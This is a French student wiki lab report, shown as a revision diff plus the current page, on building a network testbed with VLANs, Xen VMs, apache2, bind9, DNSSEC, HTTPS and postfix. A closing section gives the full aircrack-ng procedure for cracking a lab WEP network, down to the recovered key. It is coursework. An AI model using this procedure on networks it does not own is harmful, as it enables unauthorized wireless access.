TP sysres IMA2a5 2016/2017 G2 : Différence entre versions
(14 révisions intermédiaires par le même utilisateur non affichées) | |||
Ligne 1 : | Ligne 1 : | ||
= Introduction = | = Introduction = | ||
Page wiki documentant le travail réalisé en dernière année en filière IMA2A5 à Polytech. | Page wiki documentant le travail réalisé en dernière année en filière IMA2A5 à Polytech. | ||
+ | |||
L'objectif du TP était de réaliser une maquette réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. | L'objectif du TP était de réaliser une maquette réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. | ||
− | = Récapitulatif des IP = | + | = Architecture = |
− | VLAN | Réseau | Prénom | Xen | IP Xen | + | == Schéma global == |
+ | http://projets-ima.plil.net/mediawiki/index.php?title=Fichier:20161202_120936.jpg | ||
+ | |||
+ | == Récapitulatif des IP == | ||
+ | '''VLAN | Réseau | Prénom | Xen | IP Xen ''' | ||
-------------------------------------------------------------- | -------------------------------------------------------------- | ||
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28 | VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28 | ||
Ligne 30 : | Ligne 35 : | ||
Acquire::http::Proxy "http://helfaut.escaut.net:3128"; | Acquire::http::Proxy "http://helfaut.escaut.net:3128"; | ||
− | = Création de la | + | = Configuration du commutateur = |
+ | |||
+ | Branchement : | ||
+ | Se brancher au commutateur sur le port console. | ||
+ | |||
+ | Connexion : | ||
+ | Se mettre en root | ||
+ | minicom -os /dev/tty/USB0 (selon le port où vous êtes connecté) | ||
+ | en (mode enable) | ||
+ | |||
+ | Etat du commutateur : | ||
+ | show interface summary | ||
+ | show vlan | ||
+ | show run | ||
+ | |||
+ | == Création des Vlans == | ||
+ | Dans le minicom : | ||
+ | config term | ||
+ | vlan 2 (crée vlan 2) | ||
+ | Gradur (nom de la vlan -> noms de rapeurs comme il a était décidé en groupe) | ||
+ | exit (x2 pour quitter) | ||
+ | write | ||
+ | |||
+ | Supprimer une Vlan (au cas où): | ||
+ | no vlan 2 | ||
+ | |||
+ | == Configuration des ports == | ||
+ | ''(Se référer au schéma global)'' | ||
+ | |||
+ | Pour les vlans : | ||
+ | interface FastEthernet ?/? | ||
+ | switchport mode access (rend accessible) | ||
+ | switchport access vlan 2 (définit quelle vlan à accès au port) | ||
+ | no shut (pré-sauvegarde la config) | ||
+ | exit | ||
+ | write | ||
+ | |||
+ | Pour les ports gigabits : | ||
+ | configure terminal | ||
+ | interface Gi?/?? | ||
+ | switchport | ||
+ | switch port trunk encapsulation dot1q | ||
+ | switchport mode trunk | ||
+ | exit | ||
+ | write | ||
+ | |||
+ | = Machine virtuelle = | ||
+ | == Créer sa VM == | ||
Connexion au serveur Corduan : | Connexion au serveur Corduan : | ||
ssh cordouan.insecserv.deule.net | ssh cordouan.insecserv.deule.net | ||
Ligne 41 : | Ligne 93 : | ||
-- ip 193.48.57.179 | -- ip 193.48.57.179 | ||
-- dir /usr/local/xen | -- dir /usr/local/xen | ||
− | |||
− | |||
Liste des machines virtuelles ouvertes sur corduan : | Liste des machines virtuelles ouvertes sur corduan : | ||
xl list | xl list | ||
+ | == Lancer sa VM == | ||
Lancer sa machine virtuelle : | Lancer sa machine virtuelle : | ||
xl create /etc/xen/Gradur.cfg | xl create /etc/xen/Gradur.cfg | ||
Ligne 54 : | Ligne 105 : | ||
vim Gradur.cfg -> modifier les 2 occurrences de la version | vim Gradur.cfg -> modifier les 2 occurrences de la version | ||
+ | == Se connecter à sa VM == | ||
Se connecter à sa machine virtuelle : | Se connecter à sa machine virtuelle : | ||
xl console Gradur | xl console Gradur | ||
Ligne 63 : | Ligne 115 : | ||
www.gandi.net | www.gandi.net | ||
− | = | + | = Installation et configuration des serveurs Web apache2 et bind9 = |
− | + | ||
+ | == Installation des packages == | ||
+ | (sur sa VM et pas corduan ...) | ||
apt-get install apache2 | apt-get install apache2 | ||
− | |||
− | |||
apt-get install bind9 | apt-get install bind9 | ||
Ligne 113 : | Ligne 165 : | ||
vim /var/www/html/index.html | vim /var/www/html/index.html | ||
− | = HTTPS = | + | == DNSSEC == |
+ | |||
+ | Tout d'abord, on autorise le dnssec dans le fichier de conf : | ||
+ | /etc/bind/named.conf.options | ||
+ | -> dnssec-enable yes; | ||
+ | |||
+ | On génère les clefs asymétriques ZSK et KSK dans un dossier dédié : | ||
+ | mkdir gradur.website.dnssec ; cd gradur.website.dnssec | ||
+ | dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE gradur.website | ||
+ | dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE gradur.website | ||
+ | |||
+ | On les renomme et on les inclue dans le fichier de zone : | ||
+ | vim /etc/bind/gradur.website | ||
+ | |||
+ | $include /etc/bind/gradur.website.dnssec/gradur.website-ksk.key | ||
+ | $include /etc/bind/gradur.website.dnssec/gradur.website-zsk.key | ||
+ | |||
+ | On signe le fichier de zone : | ||
+ | dnssec-signzone -o gradur.website -k gradur.website-ksk ../gradur.website gradur.website-zsk | ||
+ | |||
+ | On relance le service bind9 : | ||
+ | service bind9 restart | ||
+ | |||
+ | Attendre la diffusion des serveurs Gandi. | ||
+ | |||
+ | == HTTPS == | ||
Autoriser le ssl : | Autoriser le ssl : | ||
Ligne 169 : | Ligne 246 : | ||
Sur gandi.net acheter une clef CSR | Sur gandi.net acheter une clef CSR | ||
+ | = Cassage de clef WEP = | ||
− | + | On passe la carte wifi en mode moniteur : | |
+ | airmon-ng start wlan0mon | ||
+ | On regarde les réseaux wifi disponible avec un chiffrement WEP: | ||
+ | airodump-ng --encrypt wep wlan0mon | ||
+ | On sélectionne un réseau cracotte (configuré en WEP). Le mieux étant de choisir un réseau dans lequel transite des paquets afin de les récupérer. (pour ne pas devoir en générer sois-même). | ||
+ | airodump-ng -w out -c 10 -essid cracotte0? wlan0mon | ||
+ | Il faut ensuite attendre d'avoir récupérer suffisament de paquets (>20.000 pour être sur d'un résultat). On lance le crack de la clé WEP: | ||
+ | aircrack-ng out-01.pcap | ||
− | + | KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ] | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | = Conclusion = | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Ce TP regroupe et traite beaucoup de tâches différentes concernant les configurations réseaux, allant du câblage de baies serveurs au communications sécurisées. J'ai le sentiment d'avoir beaucoup appris et que je pourrai mettre en application ces connaissances en entreprise très prochainement. | |
− |
Version actuelle datée du 6 décembre 2016 à 09:05
Sommaire
Introduction
Page wiki documentant le travail réalisé en dernière année en filière IMA2A5 à Polytech.
L'objectif du TP était de réaliser une maquette réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.
Architecture
Schéma global
http://projets-ima.plil.net/mediawiki/index.php?title=Fichier:20161202_120936.jpg
Récapitulatif des IP
VLAN | Réseau | Prénom | Xen | IP Xen -------------------------------------------------------------- VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28 VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28 VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28 VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28 VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28 VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28 VLAN26 193.48.57.176/28 Xen
Routeur de Dimitri:
10.60.2?.1 193.48.57.190 192.168.222.9
Routeur de Nabil:
10.60.2?.2 193.48.57.189 192.168.222.10
Modifier Proxy : (si le proxy de l'école ne fonctionne pas)
"/etc/apt/apt.conf.d/01proxy" Acquire::http::Proxy "http://helfaut.escaut.net:3128";
Configuration du commutateur
Branchement :
Se brancher au commutateur sur le port console.
Connexion :
Se mettre en root minicom -os /dev/tty/USB0 (selon le port où vous êtes connecté) en (mode enable)
Etat du commutateur :
show interface summary show vlan show run
Création des Vlans
Dans le minicom :
config term vlan 2 (crée vlan 2) Gradur (nom de la vlan -> noms de rapeurs comme il a était décidé en groupe) exit (x2 pour quitter) write
Supprimer une Vlan (au cas où):
no vlan 2
Configuration des ports
(Se référer au schéma global)
Pour les vlans :
interface FastEthernet ?/? switchport mode access (rend accessible) switchport access vlan 2 (définit quelle vlan à accès au port) no shut (pré-sauvegarde la config) exit write
Pour les ports gigabits :
configure terminal interface Gi?/?? switchport switch port trunk encapsulation dot1q switchport mode trunk exit write
Machine virtuelle
Créer sa VM
Connexion au serveur Corduan :
ssh cordouan.insecserv.deule.net
Création d'une image du serveur :
xen-create-image
Ajouter des paramètres comme ci-dessous :
--hostname Gradur -- ip 193.48.57.179 -- dir /usr/local/xen
Liste des machines virtuelles ouvertes sur corduan :
xl list
Lancer sa VM
Lancer sa machine virtuelle :
xl create /etc/xen/Gradur.cfg
En cas d'erreur, cela est probablement dû à une version différente du kernel linux du serveur et de la machine virtuelle:
ls /boot -> pour avoir la version vim Gradur.cfg -> modifier les 2 occurrences de la version
Se connecter à sa VM
Se connecter à sa machine virtuelle :
xl console Gradur
Quitter la VM :
crtl+Alt Gr + ]
Acheter un nom de domaine sur :
www.gandi.net
Installation et configuration des serveurs Web apache2 et bind9
Installation des packages
(sur sa VM et pas corduan ...)
apt-get install apache2 apt-get install bind9
DNS
Modifier le lien entre serveur DNS et l'ip du nom de domaine sur www.gandi.net
Cliquer sur son nom de domaine puis sur Gérer les 'glue records' dns.gradur.website 193.48.57.179
Cliquer sur Modifier les DNS dns.gradur.website ns6.gandi.net
Dans le fichier de conf etc/bind/named.conf.option local rajouter les options :
options { allow-transfer { "allowed_to_transfer"; }; };
acl "allowed_to_transfer" { 193.48.57.0/24 ; ... };
Dans le fichier de conf etc/bind/named.conf.local rajouter :
zone "Gradur.website" { type master; file "/etc/bind/Gradur.website/Gradur"; };
On crée le fichier de zone Gradur dans Gradure.website (en s'inspirant du cours 7.1 Service de nommage DNS) :
$TTL 259200 @ IN SOA dns.gradur.website. postmaster.gradur.website. ( 10 ; Version 7200 ; Refresh (2h) 3600 ; Retry (1h) 1209600 ; Expire (14j) 259200 ) ; Minimum TTL (3j) IN NS dns.gradur.website. IN A 193.48.57.179 IN MX 100 193.48.57.179 dns IN A 193.48.57.179
Modifier siteweb :
vim /var/www/html/index.html
DNSSEC
Tout d'abord, on autorise le dnssec dans le fichier de conf :
/etc/bind/named.conf.options -> dnssec-enable yes;
On génère les clefs asymétriques ZSK et KSK dans un dossier dédié :
mkdir gradur.website.dnssec ; cd gradur.website.dnssec dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE gradur.website dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE gradur.website
On les renomme et on les inclue dans le fichier de zone :
vim /etc/bind/gradur.website
$include /etc/bind/gradur.website.dnssec/gradur.website-ksk.key $include /etc/bind/gradur.website.dnssec/gradur.website-zsk.key
On signe le fichier de zone :
dnssec-signzone -o gradur.website -k gradur.website-ksk ../gradur.website gradur.website-zsk
On relance le service bind9 :
service bind9 restart
Attendre la diffusion des serveurs Gandi.
HTTPS
Autoriser le ssl :
a2ensite default-ssl.conf a2enmod ssl
Récupérer les 2 fichiers crt, key et crt :
Copier coller dans un nouveau fichier depuis le site : https://www.gandi.net/admin/ssl/374220/details Le certificat La clef privée (déjà sur l'ordi) L'intermédiaire
Les rajouter dans la configue :
vim /etc/apache2/sites-available/default-ssl.conf -> SSLCertificateFile /etc/apache2/cerbere.cert -> SSLCertificateKeyFile /bind/cerbere.key -> SSLCertificateChainFile /etc/apache2/Gandi.cert
Lancer les commandes de log pour voir les erreurs si il y en a :
cat /var/log/daemon.log cat /var/log/apache2/error.log
Relancer le service apache :
service apache2 stop service apache2 start
Le site est maintenant disponible en https :
https://gradur.website/
Serveur mail
Installation package postfix :
apt-get install postfix
Ajouter les options suivantes :
internet site gradur.website
Creation d'un alias :
vim /etc/aliases Ajouter -> admin : root newaliases
Installation package mailx :
apt-get install bsd-mailx
MLaintenant on peut recevoir des mails à l'adresse :
admin@gradur.website
Visualiser les mails :
Certificat CSR (https)
Sur gandi.net acheter une clef CSR
Cassage de clef WEP
On passe la carte wifi en mode moniteur :
airmon-ng start wlan0mon
On regarde les réseaux wifi disponible avec un chiffrement WEP:
airodump-ng --encrypt wep wlan0mon
On sélectionne un réseau cracotte (configuré en WEP). Le mieux étant de choisir un réseau dans lequel transite des paquets afin de les récupérer. (pour ne pas devoir en générer sois-même).
airodump-ng -w out -c 10 -essid cracotte0? wlan0mon
Il faut ensuite attendre d'avoir récupérer suffisament de paquets (>20.000 pour être sur d'un résultat). On lance le crack de la clé WEP:
aircrack-ng out-01.pcap
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]
Conclusion
Ce TP regroupe et traite beaucoup de tâches différentes concernant les configurations réseaux, allant du câblage de baies serveurs au communications sécurisées. J'ai le sentiment d'avoir beaucoup appris et que je pourrai mettre en application ces connaissances en entreprise très prochainement.